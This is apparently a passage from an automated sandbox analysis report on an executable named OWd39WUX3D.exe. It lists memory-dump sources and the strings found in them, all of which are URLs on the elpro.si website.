              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/temperaturna-stikala-wika/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/dodatni-izdelki-in-dodatki-za-tlak/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/manometri-wika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/tlacna-stikala-wika/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tok/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kontakt/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/moj-racun/lost-password/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/splosni-prodajni-pogoji/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/piskotki/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpora/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/analiza-plinov/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/ex/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/kalibracija/
